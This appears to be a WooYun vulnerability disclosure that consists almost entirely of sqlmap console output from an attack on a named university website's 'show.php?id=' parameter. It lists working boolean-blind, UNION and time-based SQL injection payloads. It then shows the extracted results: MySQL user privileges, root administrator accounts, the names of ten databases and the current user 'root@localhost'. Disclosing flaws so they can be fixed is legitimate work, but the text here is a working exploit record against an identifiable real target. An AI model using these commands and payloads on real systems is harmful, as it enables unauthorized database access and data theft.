WooYun.org

sqlmap -u "http://philo.nju.edu.cn/show.php?id=21"
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:06:00
[21:06:00] [INFO] testing connection to the target URL
[21:06:00] [INFO] testing if the target URL is stable. This can take a couple of seconds
[21:06:01] [INFO] target URL is stable
[21:06:01] [INFO] testing if GET parameter 'id' is dynamic
[21:06:02] [INFO] confirming that GET parameter 'id' is dynamic
[21:06:02] [INFO] GET parameter 'id' is dynamic
[21:06:03] [ERROR] possible integer casting detected (e.g. "$id=intval($_REQUEST['id'])") at the back-end web application
do you want to skip those kind of cases (and save scanning time)? [y/N] n
[21:06:05] [INFO] testing for SQL injection on GET parameter 'id'
[21:06:05] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:06:10] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable 
[21:06:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[21:06:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:06:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[21:06:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:06:13] [INFO] testing 'MySQL inline queries'
[21:06:13] [INFO] testing 'PostgreSQL inline queries'
[21:06:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[21:06:13] [INFO] testing 'Oracle inline queries'
[21:06:13] [INFO] testing 'SQLite inline queries'
[21:06:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:06:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[21:06:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[21:06:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:06:44] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable 
[21:06:44] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[21:06:44] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:06:44] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[21:06:46] [INFO] target URL appears to have 12 columns in query
[21:06:51] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 57 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=21' AND 9909=9909 AND 'Mwul'='Mwul
    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: id=-7407' UNION ALL SELECT NULL,NULL,CONCAT(0x71616c6f71,0x67554274434851424c6d,0x716d6b7371),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=21' AND SLEEP(5) AND 'xoOI'='xoOI
---
[21:07:33] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.4, PHP 5.4.5
back-end DBMS: MySQL 5.0.11

sqlmap -u "http://philo.nju.edu.cn/show.php?id=21" --privileges -v 0
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:08:12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=21' AND 9909=9909 AND 'Mwul'='Mwul
    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: id=-7407' UNION ALL SELECT NULL,NULL,CONCAT(0x71616c6f71,0x67554274434851424c6d,0x716d6b7371),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=21' AND SLEEP(5) AND 'xoOI'='xoOI
---
web application technology: Apache 2.4.4, PHP 5.4.5
back-end DBMS: MySQL 5.0.11
database management system users privileges:
[*] ''@'localhost' [1]:
    privilege: USAGE
[*] ''@'newphilo' [1]:
    privilege: USAGE
[*] 'rfd'@'localhost' [1]:
    privilege: USAGE
[*] 'root'@'127.0.0.1' (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'newphilo' (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

available databases [10]:                                                      
[*] information_schema
[*] ljzg
[*] logic
[*] mysql
[*] philoe
[*] philosophy
[*] rfd
[*] scanner
[*] test
[*] ultrax

current database:    'philosophy'
current user:    'root@localhost'